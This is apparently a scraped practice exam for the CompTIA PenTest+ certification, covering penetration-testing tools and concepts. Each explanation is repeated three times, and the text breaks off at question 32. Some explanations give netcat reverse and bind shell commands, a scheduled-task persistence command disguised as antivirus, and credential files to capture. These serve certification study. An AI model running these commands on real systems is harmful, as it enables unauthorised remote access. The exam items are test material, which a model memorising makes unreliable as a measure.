You have already completed the Test before. Hence you can not start it again.
Test is loading...
You must sign in or sign up to start the Test.
You have to finish following quiz, to start this Test:
Your results are here!! for" CompTIA PenTest+ (PT0-001) Practice test 3 "
0 of 65 questions answered correctly
Your time:
Time has elapsed
Your Final Score is : 0
You have attempted : 0
Number of Correct Questions : 0 and scored 0
Number of Incorrect Questions : 0 and Negative marks 0
Average score
Your score
CompTIA PenTest+ (PT0-001)
You have attempted: 0
Number of Correct Questions: 0 and scored 0
Number of Incorrect Questions: 0 and Negative marks 0
You can review your answers by clicking view questions. Important Note : Open Reference Documentation Links in New Tab (Right Click and Open in New Tab).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
Answered
Review
Question 1 of 65
1. Question
Sami is writing a report about a potential security vulnerability in a software product and wishes to use standardized product names to ensure that other security analysts understand the report. Which SCAP component can Sami turn to for assistance?
Correct
Common Product Enumeration (CPE) is an SCAP component that provides standardized nomenclature for product names and versions.
Incorrect
Common Product Enumeration (CPE) is an SCAP component that provides standardized nomenclature for product names and versions.
Unattempted
Common Product Enumeration (CPE) is an SCAP component that provides standardized nomenclature for product names and versions.
Question 2 of 65
2. Question
While performing a penetration test, the client organization begins to receive complaints from customers indicating that the organization’s web server is very slow to respond or even crashes at times. The network administrator discovers a distributed denial of service (DDoS) attack underway that is aimed at the company’s web server. Sales are being lost, so the administrator calls the penetration tester and asks them to stop the attack. What is this communication path called?
Correct
The term de-escalation refers to the process of communicating between the client and the tester to cease exploits used during the penetration test because of the adverse effects they may be having on the network
Incorrect
The term de-escalation refers to the process of communicating between the client and the tester to cease exploits used during the penetration test because of the adverse effects they may be having on the network
Unattempted
The term de-escalation refers to the process of communicating between the client and the tester to cease exploits used during the penetration test because of the adverse effects they may be having on the network
Question 3 of 65
3. Question
You are a senior penetration tester, and you are configuring your vulnerability management solution to perform credentialed scans of servers on your client’s network. What type of account should you be provided with?
Correct
Credentialed scans require read-only access to target servers. The client should follow the principle of least privilege and limit the access available to the tester. You should consider asking for a specific “audit” account to be created with similar read-only access. A dedicated “audit” account has the advantage of showing up in the logs and instantly being recognized by everyone in IT as a potentially approved activity
Incorrect
Credentialed scans require read-only access to target servers. The client should follow the principle of least privilege and limit the access available to the tester. You should consider asking for a specific “audit” account to be created with similar read-only access. A dedicated “audit” account has the advantage of showing up in the logs and instantly being recognized by everyone in IT as a potentially approved activity
Unattempted
Credentialed scans require read-only access to target servers. The client should follow the principle of least privilege and limit the access available to the tester. You should consider asking for a specific “audit” account to be created with similar read-only access. A dedicated “audit” account has the advantage of showing up in the logs and instantly being recognized by everyone in IT as a potentially approved activity
Question 4 of 65
4. Question
Dima is assisting Sami with his penetration test and would like to extend the vulnerability search to include the use of dynamic testing. Which one of the following tools can he use as an interception proxy?
Correct
The Zed Attack Proxy (ZAP) from the Open Web Application Security Project (OWASP) is an interception proxy that is very useful in penetration testing. SonarQube is a static, not dynamic, software testing tool, and OLLYDBG is a debugger.
Incorrect
The Zed Attack Proxy (ZAP) from the Open Web Application Security Project (OWASP) is an interception proxy that is very useful in penetration testing. SonarQube is a static, not dynamic, software testing tool, and OLLYDBG is a debugger.
Unattempted
The Zed Attack Proxy (ZAP) from the Open Web Application Security Project (OWASP) is an interception proxy that is very useful in penetration testing. SonarQube is a static, not dynamic, software testing tool, and OLLYDBG is a debugger.
Question 5 of 65
5. Question
Upon further inspection, Sami finds a series of thousands of requests to the same URL coming from a single IP address. Here are a few examples:
What type of vulnerability was the attacker likely trying to exploit?
Correct
The series of thousands of requests incrementing a variable indicate that the attacker was most likely attempting to exploit an insecure direct object reference vulnerability.
Incorrect
The series of thousands of requests incrementing a variable indicate that the attacker was most likely attempting to exploit an insecure direct object reference vulnerability.
Unattempted
The series of thousands of requests incrementing a variable indicate that the attacker was most likely attempting to exploit an insecure direct object reference vulnerability.
Question 6 of 65
6. Question
Sami recently conducted a penetration test for a company that is regulated under PCI DSS. Two months after the test, the client asks for a letter documenting the test results for its compliance files. What type of report is the client requesting?
Correct
An attestation of findings is a certification provided by the penetration testers to document that they conducted a test and the results for compliance purposes.
Incorrect
An attestation of findings is a certification provided by the penetration testers to document that they conducted a test and the results for compliance purposes.
Unattempted
An attestation of findings is a certification provided by the penetration testers to document that they conducted a test and the results for compliance purposes.
Question 7 of 65
7. Question
One of the goals of communication between the tester and the client during a penetration test is to ensure that both parties clearly understand the current security state of the network. Which of the following options is a term that best describes this shared understanding?
Correct
Among other things, the term situational awareness refers to a state of shared understanding between the client and the tester regarding the security posture of the client’s network.
Incorrect
Among other things, the term situational awareness refers to a state of shared understanding between the client and the tester regarding the security posture of the client’s network.
Unattempted
Among other things, the term situational awareness refers to a state of shared understanding between the client and the tester regarding the security posture of the client’s network.
Question 8 of 65
8. Question
A few days after exploiting a target with the Metasploit Meterpreter payload, Roberto loses access to the remote host. A vulnerability scan shows that the vulnerability that he used to exploit the system originally is still open. What has most likely happened?
Correct
Meterpreter is a memory resident tool that injects itself into another process. The most likely answer is that the system was rebooted, thus removing the memory resident Meterpreter process. Roberto can simply repeat his exploit to regain access, but he may want to take additional steps to ensure continued access.
Incorrect
Meterpreter is a memory resident tool that injects itself into another process. The most likely answer is that the system was rebooted, thus removing the memory resident Meterpreter process. Roberto can simply repeat his exploit to regain access, but he may want to take additional steps to ensure continued access.
Unattempted
Meterpreter is a memory resident tool that injects itself into another process. The most likely answer is that the system was rebooted, thus removing the memory resident Meterpreter process. Roberto can simply repeat his exploit to regain access, but he may want to take additional steps to ensure continued access.
Question 9 of 65
9. Question
After running an SNMP sweep, Sami finds that he didn’t receive any results. If he knows there are no network protection devices in place and that there are devices that should respond to SNMP queries, what problem does he most likely have?
Correct
Most modern SNMP deployments use a non-default community string. If Sami does not have the correct community string, he will not receive the information he is looking for. If port 25 looked like an attractive answer, you’re likely thinking of SMTP. Having an SNMP private string set will not stop Sami’s query if he has the proper community string, but not having the right community string will!
Incorrect
Most modern SNMP deployments use a non-default community string. If Sami does not have the correct community string, he will not receive the information he is looking for. If port 25 looked like an attractive answer, you’re likely thinking of SMTP. Having an SNMP private string set will not stop Sami’s query if he has the proper community string, but not having the right community string will!
Unattempted
Most modern SNMP deployments use a non-default community string. If Sami does not have the correct community string, he will not receive the information he is looking for. If port 25 looked like an attractive answer, you’re likely thinking of SMTP. Having an SNMP private string set will not stop Sami’s query if he has the proper community string, but not having the right community string will!
Question 10 of 65
10. Question
Which of the following options is an external resource or API that may be installed in Maltego to expand its capabilities?
Correct
An external resource or API that may be installed in Maltego to expand its capabilities is called a transform. Other options are incorrect. Although related definitionally, the terms “shift,” “modifier,” and “tweak” are not relevant to Maltego
Incorrect
An external resource or API that may be installed in Maltego to expand its capabilities is called a transform. Other options are incorrect. Although related definitionally, the terms “shift,” “modifier,” and “tweak” are not relevant to Maltego
Unattempted
An external resource or API that may be installed in Maltego to expand its capabilities is called a transform. Other options are incorrect. Although related definitionally, the terms “shift,” “modifier,” and “tweak” are not relevant to Maltego
Question 11 of 65
11. Question
You are working as a penetration tester, and you are conducting a test for a new client. You have successfully exploited a DM2 server that seems to be listening to an outbound port. You want to forward that traffic back to a device. What are the best tools to do this? Select two options.
Correct
In this scenario, the best options are SSH and Wireshark. Secure Shell (SSH) provides secure encrypted connections between systems. SSH provides remote shell access via an encrypted connection. SSH is used for secure command-line access to systems, typically via TCP port 22, and is found on devices and systems of all types. Because SSH is so common, testing systems that provide an SSH service is a very attractive option for a penetration tester. Wireshark is a protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic. Wireshark also allows for capturing network traffic from wireless networks
Incorrect
In this scenario, the best options are SSH and Wireshark. Secure Shell (SSH) provides secure encrypted connections between systems. SSH provides remote shell access via an encrypted connection. SSH is used for secure command-line access to systems, typically via TCP port 22, and is found on devices and systems of all types. Because SSH is so common, testing systems that provide an SSH service is a very attractive option for a penetration tester. Wireshark is a protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic. Wireshark also allows for capturing network traffic from wireless networks
Unattempted
In this scenario, the best options are SSH and Wireshark. Secure Shell (SSH) provides secure encrypted connections between systems. SSH provides remote shell access via an encrypted connection. SSH is used for secure command-line access to systems, typically via TCP port 22, and is found on devices and systems of all types. Because SSH is so common, testing systems that provide an SSH service is a very attractive option for a penetration tester. Wireshark is a protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic. Wireshark also allows for capturing network traffic from wireless networks
Question 12 of 65
12. Question
You are working as a penetration tester, and you are conducting a test for a new client. You are conducting a test and have compromised the client’s host. What is the correct syntax to create a Netcat listener on this device?
Correct
Netcat can be used to set up a Telnet server in a matter of seconds. You can specify the shell you want Netcat to run at a successful connection with the -e parameter. In this scenario, the proper syntax would be nc -lp 444 -e /bin/bash. The nc tells Windows to run the nc.exe file with the following arguments: -l: Specifies listen mode, for inbound connections -p: Specifies a port to listen for a connection on -e: Tells what program to run once the port is connected to (cmd.exe) -v: Be verbose, printing out messages on standard error, such as when a connection occurs
Incorrect
Netcat can be used to set up a Telnet server in a matter of seconds. You can specify the shell you want Netcat to run at a successful connection with the -e parameter. In this scenario, the proper syntax would be nc -lp 444 -e /bin/bash. The nc tells Windows to run the nc.exe file with the following arguments: -l: Specifies listen mode, for inbound connections -p: Specifies a port to listen for a connection on -e: Tells what program to run once the port is connected to (cmd.exe) -v: Be verbose, printing out messages on standard error, such as when a connection occurs
Unattempted
Netcat can be used to set up a Telnet server in a matter of seconds. You can specify the shell you want Netcat to run at a successful connection with the -e parameter. In this scenario, the proper syntax would be nc -lp 444 -e /bin/bash. The nc tells Windows to run the nc.exe file with the following arguments: -l: Specifies listen mode, for inbound connections -p: Specifies a port to listen for a connection on -e: Tells what program to run once the port is connected to (cmd.exe) -v: Be verbose, printing out messages on standard error, such as when a connection occurs
Question 13 of 65
13. Question
You are a senior penetration tester, and you are conducting the information gathering phase of a black box penetration test. You want to eavesdrop on the radio frequency emissions being emitted from the client’s facility and try to capture data from their wireless network. You are parked in the client’s parking lot. What utility could you use on your Linux laptop to break the encryption that the client is using on their wireless network?
Correct
Aircrack-ng is a complete suite of tools to assess wireless network security. It focuses on different areas of Wi-Fi security. ? Monitoring: Packet capture and export of data to text files for further processing by third-party tools. ? Attacking: Replay attacks, deauthentication, fake access points, and others via packet injection. ? Testing: Checking Wi-Fi cards and driver capabilities. ? Cracking: Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access 2 – Pre-Shared Key (WPA PSK).
Incorrect
Aircrack-ng is a complete suite of tools to assess wireless network security. It focuses on different areas of Wi-Fi security. ? Monitoring: Packet capture and export of data to text files for further processing by third-party tools. ? Attacking: Replay attacks, deauthentication, fake access points, and others via packet injection. ? Testing: Checking Wi-Fi cards and driver capabilities. ? Cracking: Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access 2 – Pre-Shared Key (WPA PSK).
Unattempted
Aircrack-ng is a complete suite of tools to assess wireless network security. It focuses on different areas of Wi-Fi security. ? Monitoring: Packet capture and export of data to text files for further processing by third-party tools. ? Attacking: Replay attacks, deauthentication, fake access points, and others via packet injection. ? Testing: Checking Wi-Fi cards and driver capabilities. ? Cracking: Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access 2 – Pre-Shared Key (WPA PSK).
Question 14 of 65
14. Question
You are working as a penetration tester, and you are working with a new client discussing an upcoming penetration test. The client has requested that you perform a “crystal box” test of their network. What type of penetration testing is the client requesting you perform?
Correct
White box tests, sometimes called crystal box or full knowledge tests, allow testers to see everything inside a network. They are performed with full knowledge of the principal technologies, configurations, and settings that make up the target. Testers will typically have information including network diagrams, lists of systems and IP network ranges, and even credentials to the systems. White box tests are often more complete, as testers can get to every system, service, or other target that is in scope.
Incorrect
White box tests, sometimes called crystal box or full knowledge tests, allow testers to see everything inside a network. They are performed with full knowledge of the principal technologies, configurations, and settings that make up the target. Testers will typically have information including network diagrams, lists of systems and IP network ranges, and even credentials to the systems. White box tests are often more complete, as testers can get to every system, service, or other target that is in scope.
Unattempted
White box tests, sometimes called crystal box or full knowledge tests, allow testers to see everything inside a network. They are performed with full knowledge of the principal technologies, configurations, and settings that make up the target. Testers will typically have information including network diagrams, lists of systems and IP network ranges, and even credentials to the systems. White box tests are often more complete, as testers can get to every system, service, or other target that is in scope.
Question 15 of 65
15. Question
Which of the following options is a type of penetration test that is not aimed at identifying as many vulnerabilities as possible and instead focuses on vulnerabilities that specifically align with the goals of gaining control of specific systems or data?
Correct
A red-team assessment is intended to simulate an actual attack or penetration, and testers will focus on finding ways in and maximizing access rather than comprehensively identifying and testing all the vulnerabilities and flaws that they can find.
Incorrect
A red-team assessment is intended to simulate an actual attack or penetration, and testers will focus on finding ways in and maximizing access rather than comprehensively identifying and testing all the vulnerabilities and flaws that they can find.
Unattempted
A red-team assessment is intended to simulate an actual attack or penetration, and testers will focus on finding ways in and maximizing access rather than comprehensively identifying and testing all the vulnerabilities and flaws that they can find.
Question 16 of 65
16. Question
Sami recently identified a new security vulnerability and computed its CVSSv2 base score as 6.5. Which risk category would this vulnerability fall into?
Correct
Vulnerabilities with a CVSSv2 score higher than 6.0 but less than 10.0 fall into the High risk category
Incorrect
Vulnerabilities with a CVSSv2 score higher than 6.0 but less than 10.0 fall into the High risk category
Unattempted
Vulnerabilities with a CVSSv2 score higher than 6.0 but less than 10.0 fall into the High risk category
Question 17 of 65
17. Question
You are working as a penetration tester, and you are conducting a test for a new client. You want to do a search to see your client’s computers and devices that are connected to the Internet. You want to be able to use a variety of filters. What tool can you use to accomplish this?
Correct
Shodan is a popular security search engine and provides prebuilt searches as well as categories of search for industrial control systems, databases, and other common search queries. Shodan is a search engine that lets the user find specific types of computers and devices that are connected to the Internet using a variety of filters. Some have described it as a search engine of service banners, which are metadata that the server sends back to the client. Using Shodan for penetration testing requires some basic knowledge of banners including HTTP status codes
Incorrect
Shodan is a popular security search engine and provides prebuilt searches as well as categories of search for industrial control systems, databases, and other common search queries. Shodan is a search engine that lets the user find specific types of computers and devices that are connected to the Internet using a variety of filters. Some have described it as a search engine of service banners, which are metadata that the server sends back to the client. Using Shodan for penetration testing requires some basic knowledge of banners including HTTP status codes
Unattempted
Shodan is a popular security search engine and provides prebuilt searches as well as categories of search for industrial control systems, databases, and other common search queries. Shodan is a search engine that lets the user find specific types of computers and devices that are connected to the Internet using a variety of filters. Some have described it as a search engine of service banners, which are metadata that the server sends back to the client. Using Shodan for penetration testing requires some basic knowledge of banners including HTTP status codes
Question 18 of 65
18. Question
You are working as a penetration tester, and you are conducting a test for a new client. You plan on using nmap. Which nmap switch must you use if you want to scan all the TCP ports on an identified device?
Correct
Nmap is the most commonly used command-line vulnerability scanner and is a free, open source tool. It provides a broad range of capabilities, including multiple scan modes intended to bypass firewalls and other network protection devices. Nmap is a port scanner. To scan for ports, you will want to use the -p (only scan specified ports). This option specifies which ports you want to scan and overrides the default scan. Individual port numbers or ranges are acceptable. Ranges are separated by a hyphen (for example 1–1023). The beginning and/or end values of a range may be omitted, causing nmap to use 1 and 65535, respectively. So, you can specify -p- to scan ports from 1 through 65535. Port scanning a system simply requires that nmap be installed and that you provide the target system’s hostname or IP address.
Incorrect
Nmap is the most commonly used command-line vulnerability scanner and is a free, open source tool. It provides a broad range of capabilities, including multiple scan modes intended to bypass firewalls and other network protection devices. Nmap is a port scanner. To scan for ports, you will want to use the -p (only scan specified ports). This option specifies which ports you want to scan and overrides the default scan. Individual port numbers or ranges are acceptable. Ranges are separated by a hyphen (for example 1–1023). The beginning and/or end values of a range may be omitted, causing nmap to use 1 and 65535, respectively. So, you can specify -p- to scan ports from 1 through 65535. Port scanning a system simply requires that nmap be installed and that you provide the target system’s hostname or IP address.
Unattempted
Nmap is the most commonly used command-line vulnerability scanner and is a free, open source tool. It provides a broad range of capabilities, including multiple scan modes intended to bypass firewalls and other network protection devices. Nmap is a port scanner. To scan for ports, you will want to use the -p (only scan specified ports). This option specifies which ports you want to scan and overrides the default scan. Individual port numbers or ranges are acceptable. Ranges are separated by a hyphen (for example 1–1023). The beginning and/or end values of a range may be omitted, causing nmap to use 1 and 65535, respectively. So, you can specify -p- to scan ports from 1 through 65535. Port scanning a system simply requires that nmap be installed and that you provide the target system’s hostname or IP address.
Question 19 of 65
19. Question
You are working as a penetration tester, and you are conducting a test for a new client. You want to conduct open-source intelligence (OSINT) data collection from publicly available sources. Which of the following tools can you use? Select two options.
Correct
There are a variety of tools that assist with this OSINT collection: ? Censys is a web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine. ? Fingerprinting Organizations with Collected Archives (FOCA) is an open source tool used to find metadata within Office documents, PDFs, and other common file formats. ? Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts. ? Nslookup tools help identify the IP addresses associated with an organization. ? Recon-ng is a modular web reconnaissance framework that organizes and manages OSINT work. ? Shodan is a specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources. ? the Harvester scours search engines and other resources to find email addresses, employee names, and infrastructure details about organization ? Whois tools gather information from public records about ownership
Incorrect
There are a variety of tools that assist with this OSINT collection: ? Censys is a web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine. ? Fingerprinting Organizations with Collected Archives (FOCA) is an open source tool used to find metadata within Office documents, PDFs, and other common file formats. ? Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts. ? Nslookup tools help identify the IP addresses associated with an organization. ? Recon-ng is a modular web reconnaissance framework that organizes and manages OSINT work. ? Shodan is a specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources. ? the Harvester scours search engines and other resources to find email addresses, employee names, and infrastructure details about organization ? Whois tools gather information from public records about ownership
Unattempted
There are a variety of tools that assist with this OSINT collection: ? Censys is a web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine. ? Fingerprinting Organizations with Collected Archives (FOCA) is an open source tool used to find metadata within Office documents, PDFs, and other common file formats. ? Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts. ? Nslookup tools help identify the IP addresses associated with an organization. ? Recon-ng is a modular web reconnaissance framework that organizes and manages OSINT work. ? Shodan is a specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources. ? the Harvester scours search engines and other resources to find email addresses, employee names, and infrastructure details about organization ? Whois tools gather information from public records about ownership
Question 20 of 65
20. Question
You are working as a penetration tester, and you are conducting a test for a new client. You are planning to create a custom wordlist of common words and catchphrases about your client using the client’s website. What is the name of the tool that you can utilize to assist with building a custom wordlist?
Correct
The Custom Word List (CeWL) generator is a Ruby application that allows a tester to scour a website based on a URL and depth setting and then generate a wordlist from the files and web pages it finds. Running CeWL against a target organization’s websites can help generate a custom wordlist. Building a custom wordlist can be particularly useful if you have gathered a lot of information about your target organization.
Incorrect
The Custom Word List (CeWL) generator is a Ruby application that allows a tester to scour a website based on a URL and depth setting and then generate a wordlist from the files and web pages it finds. Running CeWL against a target organization’s websites can help generate a custom wordlist. Building a custom wordlist can be particularly useful if you have gathered a lot of information about your target organization.
Unattempted
The Custom Word List (CeWL) generator is a Ruby application that allows a tester to scour a website based on a URL and depth setting and then generate a wordlist from the files and web pages it finds. Running CeWL against a target organization’s websites can help generate a custom wordlist. Building a custom wordlist can be particularly useful if you have gathered a lot of information about your target organization.
Question 21 of 65
21. Question
Dima wants to attack a WPS-enabled system. What attack technique can she use against it?
Correct
Pixie dust attacks use brute force to identify the key for vulnerable WPS-enabled routers due to poor key selection practices. The other options are made up!
Incorrect
Pixie dust attacks use brute force to identify the key for vulnerable WPS-enabled routers due to poor key selection practices. The other options are made up!
Unattempted
Pixie dust attacks use brute force to identify the key for vulnerable WPS-enabled routers due to poor key selection practices. The other options are made up!
Question 22 of 65
22. Question
You are working as a penetration tester, and you are conducting a test for a new client. During a gray box penetration test you want to be able to set up a bind shell exploit where a listener is set up on a compromised system on the client’s network. Which remote access tools can you use to do this? Select two options.
Correct
Netcat is an open source network debugging and exploration utility that can read and write data across network connections, using the TCP/IP protocol. Netcat is also a popular remote access tool, and it has a small footprint that makes it easily portable to many systems during a penetration test. Setting up a reverse shell with netcat on Linux looks like this: nc [IP of remote system] [port] -e /bin/sh Setting up a reverse shell with netcat on Windows looks like this: nc [IP of remote system] [port] -e cmd.exe It is also fairly easy to set up netcat as a listener by using this: nc -l -p [port] Ncat is designed as a successor to Netcat and has the same functionality including a variety of additional capabilities, including using SSL, proxies, and tricks such as sending email or chaining Ncat sessions together as part of a chain to allow pivoting.
Incorrect
Netcat is an open source network debugging and exploration utility that can read and write data across network connections, using the TCP/IP protocol. Netcat is also a popular remote access tool, and it has a small footprint that makes it easily portable to many systems during a penetration test. Setting up a reverse shell with netcat on Linux looks like this: nc [IP of remote system] [port] -e /bin/sh Setting up a reverse shell with netcat on Windows looks like this: nc [IP of remote system] [port] -e cmd.exe It is also fairly easy to set up netcat as a listener by using this: nc -l -p [port] Ncat is designed as a successor to Netcat and has the same functionality including a variety of additional capabilities, including using SSL, proxies, and tricks such as sending email or chaining Ncat sessions together as part of a chain to allow pivoting.
Unattempted
Netcat is an open source network debugging and exploration utility that can read and write data across network connections, using the TCP/IP protocol. Netcat is also a popular remote access tool, and it has a small footprint that makes it easily portable to many systems during a penetration test. Setting up a reverse shell with netcat on Linux looks like this: nc [IP of remote system] [port] -e /bin/sh Setting up a reverse shell with netcat on Windows looks like this: nc [IP of remote system] [port] -e cmd.exe It is also fairly easy to set up netcat as a listener by using this: nc -l -p [port] Ncat is designed as a successor to Netcat and has the same functionality including a variety of additional capabilities, including using SSL, proxies, and tricks such as sending email or chaining Ncat sessions together as part of a chain to allow pivoting.
Question 23 of 65
23. Question
Sami is conducting a penetration test against a web application and is looking for potential vulnerabilities to exploit. Which of the following vulnerabilities does not commonly exist in web applications?
Correct
Web applications commonly experience SQL injection, buffer overflow, and cross-site scripting vulnerabilities. Virtual machine (VM) escape attacks work against the hypervisor of a virtualization platform and are not generally exploitable over the Web.
Incorrect
Web applications commonly experience SQL injection, buffer overflow, and cross-site scripting vulnerabilities. Virtual machine (VM) escape attacks work against the hypervisor of a virtualization platform and are not generally exploitable over the Web.
Unattempted
Web applications commonly experience SQL injection, buffer overflow, and cross-site scripting vulnerabilities. Virtual machine (VM) escape attacks work against the hypervisor of a virtualization platform and are not generally exploitable over the Web.
Question 24 of 65
24. Question
Sami is conducting an onsite penetration test. The test is a gray box test, and he is permitted onsite but has not been given access to the wired or wireless networks. He knows he needs to gain access to both to make further progress. Once Sami has gained access to the network, what technique can he use to gather additional credentials?
Correct
Sami can use ARP spoofing to represent his workstation as a legitimate system that other devices are attempting to connect to. As long as his responses are faster, he will then receive traffic and can act as a man in the middle. Network sniffing is useful after this to read traffic, but it isn’t useful for most traffic on its own on a switched network. SYN floods are not useful for gaining credentials.
Incorrect
Sami can use ARP spoofing to represent his workstation as a legitimate system that other devices are attempting to connect to. As long as his responses are faster, he will then receive traffic and can act as a man in the middle. Network sniffing is useful after this to read traffic, but it isn’t useful for most traffic on its own on a switched network. SYN floods are not useful for gaining credentials.
Unattempted
Sami can use ARP spoofing to represent his workstation as a legitimate system that other devices are attempting to connect to. As long as his responses are faster, he will then receive traffic and can act as a man in the middle. Network sniffing is useful after this to read traffic, but it isn’t useful for most traffic on its own on a switched network. SYN floods are not useful for gaining credentials.
Question 25 of 65
25. Question
Which static web page is focused on information gathering, providing web links and resources that can be used during the reconnaissance process, and can greatly aid penetration testers in the data-mining process?
Correct
The OSINT Framework is a static web page is focused on information gathering, providing web links and resources that can be used during the reconnaissance process and can greatly aid penetration testers in the data mining process. Other options are incorrect, because Maltego is an OSINT collection application that is known for its ability to build and illustrate connections between various data point, also because Shodan and Censys are Internet of Things (IoT) search engines that excel at finding open services on the Internet. It is also worth noting that as search engines, definitionally neither Shodan nor Censys can be static pages.
Incorrect
The OSINT Framework is a static web page is focused on information gathering, providing web links and resources that can be used during the reconnaissance process and can greatly aid penetration testers in the data mining process. Other options are incorrect, because Maltego is an OSINT collection application that is known for its ability to build and illustrate connections between various data point, also because Shodan and Censys are Internet of Things (IoT) search engines that excel at finding open services on the Internet. It is also worth noting that as search engines, definitionally neither Shodan nor Censys can be static pages.
Unattempted
The OSINT Framework is a static web page is focused on information gathering, providing web links and resources that can be used during the reconnaissance process and can greatly aid penetration testers in the data mining process. Other options are incorrect, because Maltego is an OSINT collection application that is known for its ability to build and illustrate connections between various data point, also because Shodan and Censys are Internet of Things (IoT) search engines that excel at finding open services on the Internet. It is also worth noting that as search engines, definitionally neither Shodan nor Censys can be static pages.
Question 26 of 65
26. Question
You are working as a penetration tester, and you are conducting a test for a new client. You want to target the NetBIOS name service. Which of the following commands is the most likely to be used to exploit the NetBIOS name service?
Correct
Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network. Responder is a powerful tool when exploiting NetBIOS responses. It can target individual systems or entire local networks, allowing you to analyze or respond to NetBIOS name services, pretending to be the system that the query is intended for
Incorrect
Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network. Responder is a powerful tool when exploiting NetBIOS responses. It can target individual systems or entire local networks, allowing you to analyze or respond to NetBIOS name services, pretending to be the system that the query is intended for
Unattempted
Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network. Responder is a powerful tool when exploiting NetBIOS responses. It can target individual systems or entire local networks, allowing you to analyze or respond to NetBIOS name services, pretending to be the system that the query is intended for
Question 27 of 65
27. Question
During an early phase of his penetration test, Sami recovers a binary executable file that he wants to quickly analyze for useful information. Which of the following tools will quickly give him a view of potentially useful information in the binary?
Correct
The Strings command parses a file for strings of text and outputs them. It is often useful for analyzing binary files, since you can quickly check for useful information with a single quick command-line tool. Netcat, while often called a pen-tester’s Swiss Army knife, isn’t useful for this type of analysis. Eclipse is an IDE and would be useful for editing code or for managing a full decompiler in some cases
Incorrect
The Strings command parses a file for strings of text and outputs them. It is often useful for analyzing binary files, since you can quickly check for useful information with a single quick command-line tool. Netcat, while often called a pen-tester’s Swiss Army knife, isn’t useful for this type of analysis. Eclipse is an IDE and would be useful for editing code or for managing a full decompiler in some cases
Unattempted
The Strings command parses a file for strings of text and outputs them. It is often useful for analyzing binary files, since you can quickly check for useful information with a single quick command-line tool. Netcat, while often called a pen-tester’s Swiss Army knife, isn’t useful for this type of analysis. Eclipse is an IDE and would be useful for editing code or for managing a full decompiler in some cases
Question 28 of 65
28. Question
During a penetration test, Sami discovers that he is unable to scan a server that he was able to successfully scan earlier in the day from the same IP address. What has most likely happened?
Correct
The IP address or network that Alex is sending his traffic from was most likely blacklisted as part of the target organization’s defensive practices. A whitelist would allow him in, and it is far less likely that the server or network has gone down.
Incorrect
The IP address or network that Alex is sending his traffic from was most likely blacklisted as part of the target organization’s defensive practices. A whitelist would allow him in, and it is far less likely that the server or network has gone down.
Unattempted
The IP address or network that Alex is sending his traffic from was most likely blacklisted as part of the target organization’s defensive practices. A whitelist would allow him in, and it is far less likely that the server or network has gone down.
Question 29 of 65
29. Question
You are working as a penetration tester, and you are conducting a test for a new client. You want to deploy a malicious website as part of the test to exploit the browsers belonging to the client’s employees. What tool can the test utilize?
Correct
The Browser Exploitation Framework (BeEF) is designed for this type of attack. BeEF provides an automated toolkit for using social engineering to take over a client’s web browser. You can then use various phishing and social engineering techniques to get employees to visit the site.
Incorrect
The Browser Exploitation Framework (BeEF) is designed for this type of attack. BeEF provides an automated toolkit for using social engineering to take over a client’s web browser. You can then use various phishing and social engineering techniques to get employees to visit the site.
Unattempted
The Browser Exploitation Framework (BeEF) is designed for this type of attack. BeEF provides an automated toolkit for using social engineering to take over a client’s web browser. You can then use various phishing and social engineering techniques to get employees to visit the site.
Question 30 of 65
30. Question
After gaining access to a Linux system through a vulnerable service, Dima wants to list all of the user accounts on the system and their home directories. Which of the following locations will provide this list?
Correct
On most Linux systems, the /etc/passwd file will contain a list of users as well as their home directories. Capturing both /etc/passwd and /etc/shadow are important for password cracking, making both desirable targets for penetration testers.
Incorrect
On most Linux systems, the /etc/passwd file will contain a list of users as well as their home directories. Capturing both /etc/passwd and /etc/shadow are important for password cracking, making both desirable targets for penetration testers.
Unattempted
On most Linux systems, the /etc/passwd file will contain a list of users as well as their home directories. Capturing both /etc/passwd and /etc/shadow are important for password cracking, making both desirable targets for penetration testers.
Question 31 of 65
31. Question
After gaining access to a Windows system, Sami uses the following command: SchTasks /create /SC Weekly /TN “Antivirus” /TR C:\Users\SSmith\av.exe” /ST 09:00. What has he accomplished?
Correct
Sami has used the scheduled tasks tool to set up a weekly run of av.exe from a user directory at 9 a.m. It is fair to assume in this example that Sami has gained access to SSmith’s user directory and has placed his own av.exe file there and is attempting to make it look innocuous if administrators find it.
Incorrect
Sami has used the scheduled tasks tool to set up a weekly run of av.exe from a user directory at 9 a.m. It is fair to assume in this example that Sami has gained access to SSmith’s user directory and has placed his own av.exe file there and is attempting to make it look innocuous if administrators find it.
Unattempted
Sami has used the scheduled tasks tool to set up a weekly run of av.exe from a user directory at 9 a.m. It is fair to assume in this example that Sami has gained access to SSmith’s user directory and has placed his own av.exe file there and is attempting to make it look innocuous if administrators find it.
Question 32 of 65
32. Question
You are performing a black box penetration test for a large organization that wholesales imported electronic devices in the United States. You need to probe the organization’s web server IP address to see what information is associated with it, such as the version of SSL or TLS and the cipher suite that it uses. Which tool in your penetration testing toolkit could you use to do this?
Correct
Censys is a web-based tool that probes a given IP address. It presents whatever information it can discover about the host assigned that IP address, such as the version of SSL/TLS it uses, the cipher suite it uses, and its certificate chain. Note that some organizations put their IP addresses on a blacklist, which severely limits the amount of information that Censys can discover about them
Incorrect
